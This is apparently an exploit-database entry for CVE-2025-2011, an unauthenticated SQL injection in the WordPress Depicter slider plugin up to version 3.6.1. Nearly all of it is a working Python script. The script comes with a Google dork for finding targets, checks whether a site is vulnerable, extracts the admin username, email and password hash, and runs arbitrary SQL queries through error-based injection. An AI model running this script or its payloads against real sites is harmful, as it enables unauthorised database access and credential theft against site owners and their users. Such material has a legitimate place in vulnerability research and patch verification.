# Exploit Title: WordPress Depicter Plugin 3.6.1 - SQL Injection
# Google Dork: inurl:/wp-content/plugins/depicter/
# Date: 2025-05-06
# Exploit Author: Andrew Long (datagoboom)
# Vendor Homepage: https://wordpress.org/plugins/depicter/
# Software Link: https://downloads.wordpress.org/plugin/depicter.3.6.1.zip
# Version: <= 3.6.1
# Tested on: WordPress 6.x
# CVE: CVE-2025-2011
# Description:
# The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 3.6.1.
# The vulnerability exists due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
# This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
# The vulnerability is located in the admin-ajax.php endpoint and can be exploited through the 's' parameter. The PoC demonstrates how to:
# 1. Check if a target is vulnerable
# 2. Extract admin user details
# 3. Execute custom SQL queries
# The exploit is provided as a Python script (poc.py) that includes:
# - Error-based SQL injection detection
# - Admin user information extraction
# - Custom SQL query execution capability
# - Debug mode for detailed output
#!/usr/bin/env python3
import argparse
import re
import sys
import time
import html
import urllib.parse
from urllib.parse import urlparse
try:
import requests
from colorama import Fore, Style, init
init(autoreset=True)
USE_COLOR = True
except ImportError:
class MockColorama:
def __getattr__(self, name):
return ""
Fore = Style = MockColorama()
USE_COLOR = False
print("[!] Missing dependencies. Install with: pip install requests colorama")
print("[!] Continuing without colored output...")
def print_banner():
banner = f"""
{Fore.CYAN}╔════════════════════════════════════════════════════════════════╗
{Fore.CYAN}║ {Fore.RED}CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder <3.6.2 {Fore.CYAN}║
{Fore.CYAN}║ {Fore.GREEN}By datagoboom {Fore.CYAN} ║
{Fore.CYAN}╚════════════════════════════════════════════════════════════════╝{Style.RESET_ALL}
"""
print(banner)
def verify_target(url):
parsed_url = urlparse(url)
if not parsed_url.scheme:
url = "http://" + url
if url.endswith('/'):
url = url[:-1]
print(f"{Fore.YELLOW}[*] Target URL: {url}")
return url
def test_connection(url):
try:
response = requests.get(url, timeout=10)
if response.status_code == 200:
print(f"{Fore.GREEN}[+] Successfully connected to the target")
return True
else:
print(f"{Fore.RED}[-] Received status code {response.status_code}")
return False
except requests.exceptions.RequestException as e:
print(f"{Fore.RED}[-] Connection error: {e}")
return False
def extract_data(url, sql_query, max_length=50, debug=False):
payload = f"test%' AND EXTRACTVALUE(1,CONCAT(0x7e,({sql_query}),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
target_url = f"{url}/wp-admin/admin-ajax.php?s={payload}"
try:
if debug:
print(f"{Fore.BLUE}[DEBUG] Requesting: {target_url}")
response = requests.get(target_url, timeout=20)
if debug:
print(f"{Fore.BLUE}[DEBUG] Response status: {response.status_code}")
decoded_text = html.unescape(response.text)
error_pattern = r"XPATH syntax error: '~(.*?)~'"
match = re.search(error_pattern, decoded_text)
if match:
extracted_data = match.group(1)
return extracted_data
else:
if debug:
print(f"{Fore.RED}[-] No XPATH syntax error found in response")
if "XPATH syntax error" in decoded_text:
print(f"{Fore.RED}[-] XPATH error found but regex didn't match. Response excerpt:")
print(f"{Fore.RED}[-] {decoded_text[:500]}")
else:
print(f"{Fore.RED}[-] Response doesn't contain XPATH error. Response excerpt:")
print(f"{Fore.RED}[-] {decoded_text[:500]}")
return None
except requests.exceptions.RequestException as e:
print(f"{Fore.RED}[-] Error during extraction: {e}")
return None
def check_vulnerability(url, debug=False):
print(f"{Fore.YELLOW}[*] Checking if the target is vulnerable...")
result = extract_data(url, "database()", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] Database name: {result}")
return True
else:
result = extract_data(url, "VERSION()", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] MySQL version: {result}")
return True
else:
result = extract_data(url, "'test'", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] Test value: {result}")
return True
else:
print(f"{Fore.RED}[-] Target does not appear to be vulnerable")
manual_check = f"{url}/wp-admin/admin-ajax.php?s=test%' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
print(f"{Fore.YELLOW}[*] Try checking manually in your browser: \n{manual_check}")
return False
def extract_admin_details(url, debug=False):
print(f"{Fore.YELLOW}[*] Extracting admin user details...")
admin_username = extract_data(url, "SELECT user_login FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if admin_username:
print(f"{Fore.GREEN}[+] Admin username: {admin_username}")
admin_email = extract_data(url, "SELECT user_email FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if admin_email:
print(f"{Fore.GREEN}[+] Admin email: {admin_email}")
hash_left = extract_data(url, "SELECT LEFT(user_pass,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if hash_left:
hash_right = extract_data(url, "SELECT SUBSTRING(user_pass,31,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if hash_right:
full_hash = hash_left + hash_right
else:
print(f"{Fore.YELLOW}[*] Could not retrieve full hash - bcrypt hashes are typically 60 chars long")
print(f"{Fore.GREEN}[+] Admin password hash: {full_hash}")
else:
print(f"{Fore.RED}[-] Failed to extract admin password hash")
return {
"username": admin_username,
"email": admin_email,
"password_hash": hash_left
}
else:
print(f"{Fore.RED}[-] Failed to extract admin details")
return None
def extract_custom_data(url, query, debug=False):
print(f"{Fore.YELLOW}[*] Executing custom SQL query...")
print(f"{Fore.YELLOW}[*] Query: {query}")
result = extract_data(url, query, debug=debug)
if result:
print(f"{Fore.GREEN}[+] Result: {result}")
return result
else:
print(f"{Fore.RED}[-] Failed to execute query or no results returned")
return None
def main():
parser = argparse.ArgumentParser(description='CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder')
parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
parser.add_argument('-m', '--mode', default='check', choices=['check', 'admin', 'custom'],
help='Extraction mode: check=vulnerability check, admin=admin details, custom=custom SQL query')
parser.add_argument('-q', '--query', help='Custom SQL query (use with -m custom)')
parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output')
args = parser.parse_args()
print_banner()
target_url = verify_target(args.url)
if not test_connection(target_url):
print(f"{Fore.RED}[-] Exiting due to connection failure")
sys.exit(1)
if not check_vulnerability(target_url, debug=args.debug):
if args.mode != 'check':
print(f"{Fore.YELLOW}[!] Target may not be vulnerable, but continuing with requested mode...")
else:
print(f"{Fore.RED}[-] Exiting as target does not appear to be vulnerable")
sys.exit(1)
if args.mode == 'check':
pass
elif args.mode == 'admin':
extract_admin_details(target_url, debug=args.debug)
elif args.mode == 'custom':
if not args.query:
print(f"{Fore.RED}[-] Custom mode requires a SQL query (-q/--query)")
sys.exit(1)
extract_custom_data(target_url, args.query, debug=args.debug)
print(f"\n{Fore.YELLOW}[!] Exploitation complete")
if __name__ == "__main__":
main()
